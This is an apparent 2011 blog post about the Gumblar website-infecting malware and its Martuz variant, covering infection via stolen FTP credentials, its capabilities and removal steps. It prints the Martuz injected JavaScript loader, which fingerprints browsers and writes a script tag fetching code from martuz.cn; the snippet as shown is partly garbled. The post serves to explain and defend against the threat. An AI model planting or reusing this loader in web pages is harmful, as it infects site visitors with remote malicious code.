Saturday, December 31, 2011

Gumblar - another dangerous virus

Gumblar

With Conficker slowly but surely ceding its crown as the most talked about virus of 2009, Gumblar is steadily gaining attention as the new superstar virus. The Gumblar attack first relies on compromising normally legitimate website and planting malicious scripts. US CERT reports that stolen FTP credentials are reckoned to be the main technique in play during this stage of the attack but poor configuration settings and vulnerable web applications might also play a part. Surfers who visit compromised websites are exposed to attacks that rely on well-known PDF and Flash Player vulnerabilities to plant malware onto Windows PCs. This malware is designed to redirect Google search results as well as to swipe sensitive information from compromised machines, according to early findings from ongoing analysis.


Gumblar Aliases and Variants
Gumblar is also known as Troj/JSRedir-R. A recent variant is called Martuz.

Gumblar Summary

Steals FTP credentials
Sends SPAM
Installs fake anti virus
Highjacks Google search queries
Disables security software

How To Remove Gumblar

The simplest way to remove Gumblar is to revert your website to a previous state. Or look through all your PHP, JS, HTML files and clean them manually. After that, reset your FTP credentials. The order is very important. Do not reset FTP credentials before cleaning the website, because this would only result in Gumblar stealing your new FTP password.

Martuz

As Gumblar.cn domain was taken off the web, the Gumblar hackers came up with a new variant, Martuz. The new script now injects a new version that loads malicious content from a new domain – martuz.cn.
The Martuz script code is below:
var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent; 
if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){
zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
document.write('<script document.write('<script src='http://martu"+"z.cn/vid/?id="+j+"><\/script>');}

Martuz Aliases and Variants

Martuz is a variant of Gumblar, which is also known as Troj/JSRedir-R
.

Martuz Summary

Steals FTP credentials
Sends SPAM
Installs fake anti virus
Highjacks Google search queries
Disables security software

How To Remove Martuz

The simplest way to remove Martuz is to revert your website to a previous state. Or look through all your PHP, JS, HTML files and clean them manually. After that, reset your FTP credentials. The order is very important. Do not reset FTP credentials before cleaning the website, because this would only result in Gumblar stealing your new FTP password.

No comments:

Hasleo Data Recovery FreeV3.2 - Free as in Freeware - Permanently from Hasleo Software

https://www.hasleo.com/win-data-recovery/free-data-recovery.html "Hasleo Data Recovery FreeV3.2 100% Free Data Recovery Software...